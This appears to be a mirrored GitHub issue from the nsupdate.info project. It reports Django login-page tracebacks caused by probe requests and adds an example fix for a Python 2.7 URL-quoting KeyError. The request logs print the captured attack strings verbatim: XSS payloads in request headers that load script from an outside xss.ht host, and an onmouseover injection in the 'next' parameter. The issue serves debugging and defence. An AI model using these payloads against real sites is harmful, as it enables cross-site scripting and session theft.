[GH-ISSUE #334] traceback in login_redirect #259

Closed
opened 2026-02-26 09:37:01 +03:00 by kerem · 2 comments
Owner

Originally created by @ThomasWaldmann on GitHub (Apr 10, 2018).
Original GitHub issue: https://github.com/nsupdate-info/nsupdate.info/issues/334

Looks like someone is trying to do nasty stuff, triggering tracebacks:

Internal Server Error: /admin/login/
Traceback (most recent call last):
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/core/handlers/base.py", line 164, in get_response
    response = response.render()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 158, in render
    self.content = self.rendered_content
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 135, in rendered_content
    content = template.render(context, self._request)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/backends/django.py", line 74, in render
    return self.template.render(context)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/base.py", line 209, in render
    with context.bind_template(self):
  File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__
    return self.gen.next()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/context.py", line 241, in bind_template
    updates.update(processor(self.request))
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/social_django/context_processors.py", line 44, in login_redirect
    value = quote(value)
  File "/usr/lib/python2.7/urllib.py", line 1294, in quote
    return ''.join(map(quoter, s))
KeyError: u'\xf6'

Request repr(): 
<WSGIRequest
path:/admin/login/,
GET:<QueryDict: {u'next': [u'\xf6" onmouseover=tA78(9213) //']}>,
POST:<QueryDict: {}>,
COOKIES:{'csrftoken': 'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'sessionid': 'zs1eosgtbj4vgol2zpo9yea7bvi2bn84'},
META:{'CONTENT_LENGTH': '',
 'CONTENT_TYPE': '',
 u'CSRF_COOKIE': u'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'HTTP_ACCEPT': '*/*',
 'HTTP_ACCEPT_ENCODING': 'gzip,deflate',
 'HTTP_CONNECTION': 'close',
 'HTTP_COOKIE': 'sessionid=zs1eosgtbj4vgol2zpo9yea7bvi2bn84; csrftoken=iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'HTTP_HOST': 'www.nsupdate.info',
 'HTTP_REFERER': 'https://www.nsupdate.info',
 'HTTP_USER_AGENT': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_FORWARDED_FOR': '1, 193.90.12.118',
 'HTTP_X_FORWARDED_PROTO': 'https',
 'HTTP_X_ORIGHOST': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_REAL_IP': '193.90.12.118',
 'PATH_INFO': u'/admin/login/',
 'QUERY_STRING': 'next=%f6%22%20onmouseover%3dtA78(9213)%20//',
 'REMOTE_ADDR': '193.90.12.118',
 'REMOTE_PORT': '',
 'REQUEST_METHOD': 'GET',
 'REQUEST_URI': '/admin/login/?next=%f6%22%20onmouseover%3dtA78(9213)%20//',
 u'SCRIPT_NAME': u'',
 'SERVER_NAME': 'www.nsupdate.info',
 'SERVER_PORT': '80',
 'SERVER_PROTOCOL': 'HTTP/1.0',
}>
Internal Server Error: /accounts/login/
Traceback (most recent call last):
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/core/handlers/base.py", line 164, in get_response
    response = response.render()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 158, in render
    self.content = self.rendered_content
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/response.py", line 135, in rendered_content
    content = template.render(context, self._request)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/backends/django.py", line 74, in render
    return self.template.render(context)
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/base.py", line 209, in render
    with context.bind_template(self):
  File "/usr/lib/python2.7/contextlib.py", line 17, in __enter__
    return self.gen.next()
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/django/template/context.py", line 241, in bind_template
    updates.update(processor(self.request))
  File "/srv/nsupdate.info/env/local/lib/python2.7/site-packages/social_django/context_processors.py", line 44, in login_redirect
    value = quote(value)
  File "/usr/lib/python2.7/urllib.py", line 1294, in quote
    return ''.join(map(quoter, s))
KeyError: u'\xf0'

Request repr(): 
<WSGIRequest
path:/accounts/login/,
GET:<QueryDict: {u'next': [u'\xf0\'\'\xf0""']}>,
POST:<QueryDict: {}>,
COOKIES:{'csrftoken': 'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'sessionid': 'zs1eosgtbj4vgol2zpo9yea7bvi2bn84'},
META:{'CONTENT_LENGTH': '',
 'CONTENT_TYPE': '',
 u'CSRF_COOKIE': u'iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'DOCUMENT_ROOT': '/srv/nsupdate.info/htdocs',
 'HTTP_ACCEPT': '*/*',
 'HTTP_ACCEPT_ENCODING': 'gzip,deflate',
 'HTTP_CONNECTION': 'close',
 'HTTP_COOKIE': 'sessionid=zs1eosgtbj4vgol2zpo9yea7bvi2bn84; csrftoken=iAjcPRh2v5eq2TXmjPxPmsXjwEUE0gjE',
 'HTTP_HOST': 'www.nsupdate.info',
 'HTTP_REFERER': 'https://www.nsupdate.info',
 'HTTP_USER_AGENT': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_FORWARDED_FOR': '1, 185.38.14.171',
 'HTTP_X_FORWARDED_PROTO': 'https',
 'HTTP_X_ORIGHOST': '\'>"></title></style></textarea></script>"><script src=https://ulala.xss.ht></script>',
 'HTTP_X_REAL_IP': '185.38.14.171',
 'PATH_INFO': u'/accounts/login/',
 'QUERY_STRING': "next=%f0''%f0%22%22",
 'REMOTE_ADDR': '185.38.14.171',
 'REMOTE_PORT': '',
 'REQUEST_METHOD': 'GET',
 'REQUEST_URI': "/accounts/login/?next=%f0''%f0%22%22",
 u'SCRIPT_NAME': u'',
 'SERVER_NAME': 'www.nsupdate.info',
 'SERVER_PORT': '80',
 'SERVER_PROTOCOL': 'HTTP/1.0',
}>
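Both tracebacks end in `quote(value)` raising `KeyError` on a non-ASCII character of the `next` parameter. The following added example (not code from social_django or nsupdate.info) reproduces that failure with a simplified model of Python 2.7's `urllib.quote` lookup table and contrasts it with encoding to UTF-8 before quoting; `py27_quote_model`, `quote_next` and `compare` are hypothetical names, and the sample strings are the decoded `next` values shown in the request reprs above.

```python
from urllib.parse import quote

# Simplified model of Python 2.7 urllib.quote(): its lookup table holds one
# entry per byte value (0-255), keyed by byte strings. A unicode character
# above U+007F never equals a byte-string key, so the lookup raises KeyError.
_ALWAYS_SAFE = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz0123456789_.-")


def py27_quote_model(text, safe="/"):
    table = {}
    for i in range(128):  # only ASCII keys can match a unicode character
        c = chr(i)
        table[c] = c if c in _ALWAYS_SAFE + safe else "%{:02X}".format(i)
    return "".join(map(table.__getitem__, text))  # KeyError on e.g. u'\xf6'


def quote_next(value):
    """Encode text to UTF-8 bytes first, then percent-encode the bytes."""
    if isinstance(value, str):
        value = value.encode("utf-8")
    return quote(value)


# Constructed inputs: the two decoded `next` values from the request reprs.
SAMPLES = ['\xf6" onmouseover=tA78(9213) //', '\xf0\'\'\xf0""']


def compare(samples=SAMPLES):
    """Return (modelled Python 2.7 outcome, hardened result) per sample."""
    results = []
    for s in samples:
        try:
            modelled = py27_quote_model(s)
        except KeyError as exc:
            modelled = "KeyError: %r" % exc.args[0]
        results.append((modelled, quote_next(s)))
    return results


if __name__ == "__main__":
    for modelled, hardened in compare():
        print(modelled, "->", hardened)
```

With the value percent-encoded instead of raising, the request renders the login page rather than returning a 500, and the quote characters in the probe arrive as `%22` / `%27`.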
kerem closed this issue 2026-02-26 09:37:01 +03:00

@ThomasWaldmann commented on GitHub (Sep 30, 2018):

bug in social-auth?


@ThomasWaldmann commented on GitHub (Oct 1, 2018):

someone doing xss checking / hacking.
